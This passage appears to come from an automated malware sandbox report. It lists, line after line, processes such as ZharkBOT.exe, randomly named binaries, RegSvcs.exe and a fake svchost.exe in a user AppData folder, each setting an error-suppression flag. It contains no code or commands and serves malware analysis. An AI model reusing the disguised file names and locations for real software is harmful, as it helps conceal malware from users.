                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess information set: NOOPENFILEERRORBOX
